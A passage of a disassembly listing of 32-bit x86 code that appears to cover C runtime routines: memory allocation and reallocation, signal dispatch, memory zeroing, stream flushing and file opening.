mov ecx, [ebp+arg_0]
xor edi, edi
cmp ecx, edi
jbe short loc_40D992
push 0FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
sbb eax, eax
inc eax
jnz short loc_40D992
call sub_4057D3
mov dword ptr [eax], 0Ch
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
loc_40D98B: ; CODE XREF: sub_40D94F+E6�j
; sub_40D94F+F2�j
xor eax, eax
jmp loc_40DA67
; ---------------------------------------------------------------------------
loc_40D992: ; CODE XREF: sub_40D94F+13�j
; sub_40D94F+22�j
imul ecx, [ebp+arg_4]
mov esi, ecx
mov [ebp+arg_0], esi
cmp esi, edi
jnz short loc_40D9A2
xor esi, esi
inc esi
loc_40D9A2: ; CODE XREF: sub_40D94F+4E�j
; sub_40D94F+DB�j
xor ebx, ebx
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja short loc_40DA15
cmp ds:dword_434DF4, 3
jnz short loc_40DA00
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov eax, [ebp+arg_0]
cmp eax, ds:dword_434DE4
ja short loc_40DA00
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_0]
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DA4B
mov ebx, [ebp+var_1C]
cmp ebx, edi
jz short loc_40DA04
push [ebp+arg_0]
push edi
push ebx
call sub_407B70
add esp, 0Ch
loc_40DA00: ; CODE XREF: sub_40D94F+64�j
; sub_40D94F+78�j
cmp ebx, edi
jnz short loc_40DA65
loc_40DA04: ; CODE XREF: sub_40D94F+A2�j
push esi
push 8
push ds:dword_425F68
call ds:dword_41D114
mov ebx, eax
loc_40DA15: ; CODE XREF: sub_40D94F+5B�j
cmp ebx, edi
jnz short loc_40DA65
cmp ds:dword_4262EC, edi
jz short loc_40DA54
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40D9A2
mov eax, [ebp+arg_8]
cmp eax, edi
jz loc_40D98B
mov dword ptr [eax], 0Ch
jmp loc_40D98B
sub_40D94F endp
; =============== S U B R O U T I N E =======================================
sub_40DA46 proc near ; DATA XREF: seg001:004217F8�o
xor edi, edi
mov esi, [ebp+0Ch]
sub_40DA46 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DA4B proc near ; CODE XREF: sub_40D94F+98�p
push 4
call sub_40591F
pop ecx
retn
sub_40DA4B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40D94F
loc_40DA54: ; CODE XREF: sub_40D94F+D0�j
cmp ebx, edi
jnz short loc_40DA65
mov eax, [ebp+arg_8]
cmp eax, edi
jz short loc_40DA65
mov dword ptr [eax], 0Ch
loc_40DA65: ; CODE XREF: sub_40D94F+B3�j
; sub_40D94F+C8�j ...
mov eax, ebx
loc_40DA67: ; CODE XREF: sub_40D94F+3E�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40D94F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA6D proc near ; CODE XREF: sub_4077C2+C�p
; sub_40DC88+3E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0040DBBA SIZE 000000CE BYTES
push 10h
push offset dword_421800
call __SEH_prolog4
mov ebx, [ebp+arg_0]
test ebx, ebx
jnz short loc_40DA8E
push [ebp+arg_4]
call sub_4036E0
pop ecx
jmp loc_40DC5A
; ---------------------------------------------------------------------------
loc_40DA8E: ; CODE XREF: sub_40DA6D+11�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_40DAA1
push ebx
call sub_403603
pop ecx
jmp loc_40DC58
; ---------------------------------------------------------------------------
loc_40DAA1: ; CODE XREF: sub_40DA6D+26�j
cmp ds:dword_434DF4, 3
jnz loc_40DC41
loc_40DAAE: ; CODE XREF: sub_40DA6D+169�j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja loc_40DC46
push 4
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405B25
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz loc_40DB77
cmp esi, ds:dword_434DE4
ja short loc_40DB2A
push esi
push ebx
push eax
call sub_40601A
add esp, 0Ch
test eax, eax
jz short loc_40DAF5
mov [ebp+var_1C], ebx
jmp short loc_40DB2A
; ---------------------------------------------------------------------------
loc_40DAF5: ; CODE XREF: sub_40DA6D+81�j
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB2A
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB0D
mov eax, esi
loc_40DB0D: ; CODE XREF: sub_40DA6D+9C�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
call sub_405B25
mov [ebp+var_20], eax
push ebx
push eax
call sub_405B50
add esp, 18h
loc_40DB2A: ; CODE XREF: sub_40DA6D+72�j
; sub_40DA6D+86�j ...
cmp [ebp+var_1C], edi
jnz short loc_40DB77
cmp esi, edi
jnz short loc_40DB39
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_40DB39: ; CODE XREF: sub_40DA6D+C4�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ds:dword_425F68
call ds:dword_41D114
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DB77
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DB61
mov eax, esi
loc_40DB61: ; CODE XREF: sub_40DA6D+F0�j
push eax
push ebx
push [ebp+var_1C]
call sub_407BF0
push ebx
push [ebp+var_20]
call sub_405B50
add esp, 14h
loc_40DB77: ; CODE XREF: sub_40DA6D+66�j
; sub_40DA6D+C0�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DBB1
cmp [ebp+var_20], 0
jnz short loc_40DBBA
test esi, esi
jnz short loc_40DB8E
inc esi
loc_40DB8E: ; CODE XREF: sub_40DA6D+11E�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push 0
push ds:dword_425F68
call ds:dword_41D154
mov edi, eax
jmp short loc_40DBBD
sub_40DA6D endp
; =============== S U B R O U T I N E =======================================
sub_40DBAB proc near ; DATA XREF: seg001:00421818�o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_40DBAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DBB1 proc near ; CODE XREF: sub_40DA6D+111�p
push 4
call sub_40591F
pop ecx
retn
sub_40DBB1 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DA6D
loc_40DBBA: ; CODE XREF: sub_40DA6D+11A�j
mov edi, [ebp+var_1C]
loc_40DBBD: ; CODE XREF: sub_40DA6D+13C�j
test edi, edi
jnz loc_40DC84
cmp ds:dword_4262EC, edi
jz short loc_40DBF9
push esi
call sub_408062
pop ecx
test eax, eax
jnz loc_40DAAE
call sub_4057D3
cmp [ebp+var_20], edi
jnz short loc_40DC52
loc_40DBE6: ; CODE XREF: sub_40DA6D+1F8�j
mov esi, eax
call ds:dword_41D0F0
push eax
call sub_405798
pop ecx
mov [esi], eax
jmp short loc_40DC58
; ---------------------------------------------------------------------------
loc_40DBF9: ; CODE XREF: sub_40DA6D+15E�j
test edi, edi
jnz loc_40DC84
call sub_4057D3
cmp [ebp+var_20], edi
jz short loc_40DC73
mov dword ptr [eax], 0Ch
jmp short loc_40DC84
; ---------------------------------------------------------------------------
loc_40DC13: ; CODE XREF: sub_40DA6D+1D7�j
test esi, esi
jnz short loc_40DC18
inc esi
loc_40DC18: ; CODE XREF: sub_40DA6D+1A8�j
push esi
push ebx
push 0
push ds:dword_425F68
call ds:dword_41D154
mov edi, eax
test edi, edi
jnz short loc_40DC84
cmp ds:dword_4262EC, eax
jz short loc_40DC6A
push esi
call sub_408062
pop ecx
test eax, eax
jz short loc_40DC60
loc_40DC41: ; CODE XREF: sub_40DA6D+3B�j
cmp esi, 0FFFFFFE0h
jbe short loc_40DC13
loc_40DC46: ; CODE XREF: sub_40DA6D+49�j
push esi
call sub_408062
pop ecx
call sub_4057D3
loc_40DC52: ; CODE XREF: sub_40DA6D+177�j
mov dword ptr [eax], 0Ch
loc_40DC58: ; CODE XREF: sub_40DA6D+2F�j
; sub_40DA6D+18A�j
xor eax, eax
loc_40DC5A: ; CODE XREF: sub_40DA6D+1C�j
; sub_40DA6D+219�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40DC60: ; CODE XREF: sub_40DA6D+1D2�j
call sub_4057D3
jmp loc_40DBE6
; ---------------------------------------------------------------------------
loc_40DC6A: ; CODE XREF: sub_40DA6D+1C7�j
test edi, edi
jnz short loc_40DC84
call sub_4057D3
loc_40DC73: ; CODE XREF: sub_40DA6D+19C�j
mov esi, eax
call ds:dword_41D0F0
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40DC84: ; CODE XREF: sub_40DA6D+152�j
; sub_40DA6D+18E�j ...
mov eax, edi
jmp short loc_40DC5A
; END OF FUNCTION CHUNK FOR sub_40DA6D
; =============== S U B R O U T I N E =======================================
sub_40DC88 proc near ; CODE XREF: sub_40780D+10�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jbe short loc_40DCBC
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, [esp+4+arg_8]
jnb short loc_40DCBC
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 0Ch
call sub_402F39
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40DCBC: ; CODE XREF: sub_40DC88+9�j
; sub_40DC88+16�j
imul ecx, [esp+4+arg_8]
push ecx
push [esp+8+arg_0]
call sub_40DA6D
pop ecx
pop ecx
pop esi
retn
sub_40DC88 endp
; =============== S U B R O U T I N E =======================================
sub_40DCCF proc near ; CODE XREF: sub_407B19+27�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426424, eax
mov ds:dword_426428, eax
mov ds:dword_42642C, eax
mov ds:dword_426430, eax
retn
sub_40DCCF endp
; =============== S U B R O U T I N E =======================================
sub_40DCE8 proc near ; CODE XREF: sub_40DD29+5A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, ds:dword_423E44
push esi
loc_40DCF3: ; CODE XREF: sub_40DCE8+1E�j
cmp [eax+4], edx
jz short loc_40DD08
mov esi, ecx
imul esi, 0Ch
add esi, [esp+4+arg_0]
add eax, 0Ch
cmp eax, esi
jb short loc_40DCF3
loc_40DD08: ; CODE XREF: sub_40DCE8+E�j
imul ecx, 0Ch
add ecx, [esp+4+arg_0]
pop esi
cmp eax, ecx
jnb short loc_40DD19
cmp [eax+4], edx
jz short locret_40DD1B
loc_40DD19: ; CODE XREF: sub_40DCE8+2A�j
xor eax, eax
locret_40DD1B: ; CODE XREF: sub_40DCE8+2F�j
retn
sub_40DCE8 endp
; =============== S U B R O U T I N E =======================================
sub_40DD1C proc near ; CODE XREF: sub_4101BD:loc_4101EA�p
push ds:dword_42642C
call sub_405193
pop ecx
retn
sub_40DD1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DD29 proc near ; CODE XREF: sub_4101BD+38�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0040DED3 SIZE 00000006 BYTES
push 20h
push offset dword_421820
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_28], edi
mov ebx, [ebp+arg_0]
cmp ebx, 0Bh
jg short loc_40DD91
jz short loc_40DD5C
mov eax, ebx
push 2
pop ecx
sub eax, ecx
jz short loc_40DD72
sub eax, ecx
jz short loc_40DD5C
sub eax, ecx
jz short loc_40DDBC
sub eax, ecx
jnz short loc_40DDA0
loc_40DD5C: ; CODE XREF: sub_40DD29+1C�j
; sub_40DD29+29�j
call sub_40531A
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jnz short loc_40DD7E
loc_40DD6A: ; CODE XREF: sub_40DD29+91�j
or eax, 0FFFFFFFFh
jmp loc_40DED3
; ---------------------------------------------------------------------------
loc_40DD72: ; CODE XREF: sub_40DD29+25�j
mov esi, offset dword_426424
mov eax, ds:dword_426424
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DD7E: ; CODE XREF: sub_40DD29+3F�j
push dword ptr [edi+5Ch]
mov edx, ebx
call sub_40DCE8
mov esi, eax
add esi, 8
mov eax, [esi]
jmp short loc_40DDEB
; ---------------------------------------------------------------------------
loc_40DD91: ; CODE XREF: sub_40DD29+1A�j
mov eax, ebx
sub eax, 0Fh
jz short loc_40DDD4
sub eax, 6
jz short loc_40DDC8
dec eax
jz short loc_40DDBC
loc_40DDA0: ; CODE XREF: sub_40DD29+31�j
call sub_4057D3
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
jmp short loc_40DD6A
; ---------------------------------------------------------------------------
loc_40DDBC: ; CODE XREF: sub_40DD29+2D�j
; sub_40DD29+75�j
mov esi, offset dword_42642C
mov eax, ds:dword_42642C
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDC8: ; CODE XREF: sub_40DD29+72�j
mov esi, offset dword_426428
mov eax, ds:dword_426428
jmp short loc_40DDDE
; ---------------------------------------------------------------------------
loc_40DDD4: ; CODE XREF: sub_40DD29+6D�j
mov esi, offset dword_426430
mov eax, ds:dword_426430
loc_40DDDE: ; CODE XREF: sub_40DD29+53�j
; sub_40DD29+9D�j ...
mov [ebp+var_1C], 1
push eax
call sub_405193
loc_40DDEB: ; CODE XREF: sub_40DD29+66�j
mov [ebp+var_20], eax
pop ecx
xor eax, eax
cmp [ebp+var_20], 1
jz loc_40DED3
cmp [ebp+var_20], eax
jnz short loc_40DE07
push 3
call sub_407AEA
loc_40DE07: ; CODE XREF: sub_40DD29+D5�j
cmp [ebp+var_1C], eax
jz short loc_40DE13
push eax
call sub_4059F7
pop ecx
loc_40DE13: ; CODE XREF: sub_40DD29+E1�j
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ebx, 8
jz short loc_40DE27
cmp ebx, 0Bh
jz short loc_40DE27
cmp ebx, 4
jnz short loc_40DE42
loc_40DE27: ; CODE XREF: sub_40DD29+F2�j
; sub_40DD29+F7�j
mov ecx, [edi+60h]
mov [ebp+var_2C], ecx
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DE75
mov ecx, [edi+64h]
mov [ebp+var_30], ecx
mov dword ptr [edi+64h], 8Ch
loc_40DE42: ; CODE XREF: sub_40DD29+FC�j
cmp ebx, 8
jnz short loc_40DE75
mov ecx, ds:dword_423E38
mov [ebp+var_24], ecx
loc_40DE50: ; CODE XREF: sub_40DD29+14A�j
mov ecx, ds:dword_423E3C
mov edx, ds:dword_423E38
add ecx, edx
cmp [ebp+var_24], ecx
jge short loc_40DE7C
mov ecx, [ebp+var_24]
imul ecx, 0Ch
mov edx, [edi+5Ch]
mov [ecx+edx+8], eax
inc [ebp+var_24]
jmp short loc_40DE50
; ---------------------------------------------------------------------------
loc_40DE75: ; CODE XREF: sub_40DD29+10A�j
; sub_40DD29+11C�j
call sub_40518A
mov [esi], eax
loc_40DE7C: ; CODE XREF: sub_40DD29+138�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DE9D
cmp ebx, 8
jnz short sub_40DEAC
push dword ptr [edi+64h]
push ebx
call [ebp+var_20]
pop ecx
jmp short loc_40DEB0
sub_40DD29 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE97 proc near ; DATA XREF: seg001:00421838�o
mov ebx, [ebp+8]
mov edi, [ebp-28h]
sub_40DE97 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DE9D proc near ; CODE XREF: sub_40DD29+15A�p
cmp dword ptr [ebp-1Ch], 0
jz short locret_40DEAB
push 0
call sub_40591F
pop ecx
locret_40DEAB: ; CODE XREF: sub_40DE9D+4�j
retn
sub_40DE9D endp
; =============== S U B R O U T I N E =======================================
sub_40DEAC proc near ; CODE XREF: sub_40DD29+162�j
push ebx
call dword ptr [ebp-20h]
loc_40DEB0: ; CODE XREF: sub_40DD29+16C�j
pop ecx
cmp ebx, 8
jz short loc_40DEC0
cmp ebx, 0Bh
jz short loc_40DEC0
cmp ebx, 4
jnz short loc_40DED1
loc_40DEC0: ; CODE XREF: sub_40DEAC+8�j
; sub_40DEAC+D�j
mov eax, [ebp-2Ch]
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40DED1
mov eax, [ebp-30h]
mov [edi+64h], eax
loc_40DED1: ; CODE XREF: sub_40DEAC+12�j
; sub_40DEAC+1D�j
xor eax, eax
sub_40DEAC endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_40DD29
loc_40DED3: ; CODE XREF: sub_40DD29+44�j
; sub_40DD29+CC�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40DD29
; =============== S U B R O U T I N E =======================================
sub_40DED9 proc near ; CODE XREF: sub_407B19+21�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426438, eax
retn
sub_40DED9 endp
; =============== S U B R O U T I N E =======================================
sub_40DEE3 proc near ; CODE XREF: sub_407B19+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_426444, eax
retn
sub_40DEE3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DEED proc near ; CODE XREF: sub_40DF44+31�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4
mov [ebp+var_4], edi
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_4]
shr ecx, 7
pxor xmm0, xmm0
jmp short loc_40DF0D
; ---------------------------------------------------------------------------
db 8Dh, 0A4h, 24h, 4 dup(0)
db 90h
; ---------------------------------------------------------------------------
loc_40DF0D: ; CODE XREF: sub_40DEED+16�j
; sub_40DEED+4E�j
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm0
movdqa oword ptr [edi+20h], xmm0
movdqa oword ptr [edi+30h], xmm0
movdqa oword ptr [edi+40h], xmm0
movdqa oword ptr [edi+50h], xmm0
movdqa oword ptr [edi+60h], xmm0
movdqa oword ptr [edi+70h], xmm0
lea edi, [edi+80h]
dec ecx
jnz short loc_40DF0D
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DEED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DF44 proc near ; CODE XREF: sub_407B70+27�j
; sub_40DF44+7D�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], edi
mov eax, [ebp+arg_0]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jnz short loc_40DF9E
mov ecx, [ebp+arg_8]
mov edx, ecx
and edx, 7Fh
mov [ebp+var_C], edx
cmp ecx, edx
jz short loc_40DF83
sub ecx, edx
push ecx
push eax
call sub_40DEED
add esp, 8
mov eax, [ebp+arg_0]
mov edx, [ebp+var_C]
loc_40DF83: ; CODE XREF: sub_40DF44+2B�j
test edx, edx
jz short loc_40DFCC
add eax, [ebp+arg_8]
sub eax, edx
mov [ebp+var_8], eax
xor eax, eax
mov edi, [ebp+var_8]
mov ecx, [ebp+var_C]
rep stosb
mov eax, [ebp+arg_0]
jmp short loc_40DFCC
; ---------------------------------------------------------------------------
loc_40DF9E: ; CODE XREF: sub_40DF44+1C�j
neg edi
add edi, 10h
mov [ebp+var_10], edi
xor eax, eax
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_10]
rep stosb
mov eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
add ecx, eax
sub edx, eax
push edx
push 0
push ecx
call sub_40DF44
add esp, 0Ch
mov eax, [ebp+arg_0]
loc_40DFCC: ; CODE XREF: sub_40DF44+41�j
; sub_40DF44+58�j
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DF44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFD3 proc near ; CODE XREF: sub_40813B+E�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset dword_421840
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
push 3
pop edi
loc_40DFF2: ; CODE XREF: sub_40DFD3+7F�j
mov [ebp+var_20], edi
cmp edi, ds:dword_434DC0
jge short loc_40E054
mov esi, edi
shl esi, 2
mov eax, ds:dword_433DA0
add eax, esi
cmp [eax], ebx
jz short loc_40E051
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_40E024
push eax
call sub_4034C4
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_40E024
inc [ebp+var_1C]
loc_40E024: ; CODE XREF: sub_40DFD3+40�j
; sub_40DFD3+4C�j
cmp edi, 14h
jl short loc_40E051
mov eax, ds:dword_433DA0
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_41D170
mov eax, ds:dword_433DA0
push dword ptr [esi+eax]
call sub_403603
pop ecx
mov eax, ds:dword_433DA0
mov [esi+eax], ebx
loc_40E051: ; CODE XREF: sub_40DFD3+38�j
; sub_40DFD3+54�j
inc edi
jmp short loc_40DFF2
; ---------------------------------------------------------------------------
loc_40E054: ; CODE XREF: sub_40DFD3+28�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E069
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_40DFD3 endp
; =============== S U B R O U T I N E =======================================
sub_40E069 proc near ; CODE XREF: sub_40DFD3+88�p
; DATA XREF: seg001:00421858�o
push 1
call sub_40591F
pop ecx
retn
sub_40E069 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E072 proc near ; CODE XREF: sub_40E6B0+72�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
xor ebx, ebx
test byte ptr [ebp+arg_8], 80h
push edi
push 10h
mov esi, eax
mov [ebp+var_14], ebx
mov [ebp+var_18], ebx
mov [ebp+var_2], bl
mov [ebp+var_28], 0Ch
mov [ebp+var_24], ebx
pop edi
jz short loc_40E0A4
mov [ebp+var_20], ebx
mov [ebp+var_1], 10h
jmp short loc_40E0AE
; ---------------------------------------------------------------------------
loc_40E0A4: ; CODE XREF: sub_40E072+27�j
mov [ebp+var_20], 1
mov [ebp+var_1], bl
loc_40E0AE: ; CODE XREF: sub_40E072+30�j
lea eax, [ebp+var_14]
push eax
call sub_410889
test eax, eax
pop ecx
jz short loc_40E0C9
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0C9: ; CODE XREF: sub_40E072+48�j
lea eax, [ebp+var_18]
push eax
call sub_407906
test eax, eax
pop ecx
jz short loc_40E0E4
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40E0E4: ; CODE XREF: sub_40E072+63�j
mov eax, 8000h
test [ebp+arg_8], eax
jnz short loc_40E100
test [ebp+arg_8], 74000h
jnz short loc_40E0FC
cmp [ebp+var_14], eax
jz short loc_40E100
loc_40E0FC: ; CODE XREF: sub_40E072+83�j
or [ebp+var_1], 80h
loc_40E100: ; CODE XREF: sub_40E072+7A�j
; sub_40E072+88�j
mov eax, [ebp+arg_8]
push 3
pop edx
and eax, edx
sub eax, ebx
mov ecx, 80000000h
jz short loc_40E14F
dec eax
jz short loc_40E146
dec eax
jz short loc_40E13D
loc_40E117: ; CODE XREF: sub_40E072+F6�j
; sub_40E072+14F�j ...
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_402F39
add esp, 14h
jmp loc_40E5CC
; ---------------------------------------------------------------------------
loc_40E13D: ; CODE XREF: sub_40E072+A3�j
mov [ebp+var_C], 0C0000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E146: ; CODE XREF: sub_40E072+A0�j
mov [ebp+var_C], 40000000h
jmp short loc_40E152
; ---------------------------------------------------------------------------
loc_40E14F: ; CODE XREF: sub_40E072+9D�j
mov [ebp+var_C], ecx
loc_40E152: ; CODE XREF: sub_40E072+D2�j
; sub_40E072+DB�j
mov eax, [ebp+arg_C]
sub eax, edi
jz short loc_40E18E
sub eax, edi
jz short loc_40E185
sub eax, edi
jz short loc_40E17C
sub eax, edi
jz short loc_40E177
sub eax, 40h
jnz short loc_40E117
xor eax, eax
cmp [ebp+var_C], ecx
setz al
mov [ebp+var_8], eax
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E177: ; CODE XREF: sub_40E072+F1�j
mov [ebp+var_8], edx
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E17C: ; CODE XREF: sub_40E072+ED�j
mov [ebp+var_8], 2
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E185: ; CODE XREF: sub_40E072+E9�j
mov [ebp+var_8], 1
jmp short loc_40E191
; ---------------------------------------------------------------------------
loc_40E18E: ; CODE XREF: sub_40E072+E5�j
mov [ebp+var_8], ebx
loc_40E191: ; CODE XREF: sub_40E072+103�j
; sub_40E072+108�j ...
mov eax, [ebp+arg_8]
mov edx, 700h
and eax, edx
mov ecx, 400h
cmp eax, ecx
jg short loc_40E1E2
jz short loc_40E1D9
cmp eax, ebx
jz short loc_40E1D9
cmp eax, 100h
jz short loc_40E1D0
cmp eax, 200h
jz loc_40E254
cmp eax, 300h
jnz loc_40E117
mov [ebp+var_10], 2
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D0: ; CODE XREF: sub_40E072+13D�j
mov [ebp+var_10], 4
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1D9: ; CODE XREF: sub_40E072+132�j
; sub_40E072+136�j
mov [ebp+var_10], 3
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E1E2: ; CODE XREF: sub_40E072+130�j
cmp eax, 500h
jz short loc_40E1F8
cmp eax, 600h
jz short loc_40E254
cmp eax, edx
jnz loc_40E117
loc_40E1F8: ; CODE XREF: sub_40E072+175�j
mov [ebp+var_10], 1
loc_40E1FF: ; CODE XREF: sub_40E072+15C�j
; sub_40E072+165�j ...
mov ecx, [ebp+arg_8]
mov eax, 100h
test ecx, eax
mov edi, 80h
jz short loc_40E222
mov edx, ds:dword_425F74
not edx
and edx, [ebp+arg_10]
test dl, dl
js short loc_40E222
xor edi, edi
inc edi
loc_40E222: ; CODE XREF: sub_40E072+19C�j
; sub_40E072+1AB�j
test cl, 40h
jz short loc_40E23E
or [ebp+var_C], 10000h
or edi, 4000000h
cmp [ebp+var_18], 2
jnz short loc_40E23E
or [ebp+var_8], 4
loc_40E23E: ; CODE XREF: sub_40E072+1B3�j
; sub_40E072+1C6�j
test cx, 1000h
jz short loc_40E247
or edi, eax
loc_40E247: ; CODE XREF: sub_40E072+1D1�j
test cl, 20h
jz short loc_40E25D
or edi, 8000000h
jmp short loc_40E268
; ---------------------------------------------------------------------------
loc_40E254: ; CODE XREF: sub_40E072+144�j
; sub_40E072+17C�j
mov [ebp+var_10], 5
jmp short loc_40E1FF
; ---------------------------------------------------------------------------
loc_40E25D: ; CODE XREF: sub_40E072+1D8�j
test cl, 10h
jz short loc_40E268
or edi, 10000000h
loc_40E268: ; CODE XREF: sub_40E072+1E0�j
; sub_40E072+1EE�j
call sub_40EEB0
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_40E28B
call sub_4057E6
mov [eax], ebx
or dword ptr [esi], 0FFFFFFFFh
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_40E2DB
; ---------------------------------------------------------------------------
loc_40E28B: ; CODE XREF: sub_40E072+200�j
mov eax, [ebp+arg_0]
push ebx
push edi
push [ebp+var_10]
mov dword ptr [eax], 1
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
push [ebp+var_C]
push [ebp+arg_4]
call ds:dword_41D06C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_40E2E7
mov esi, [esi]
mov eax, esi
and esi, 1Fh
imul esi, 28h
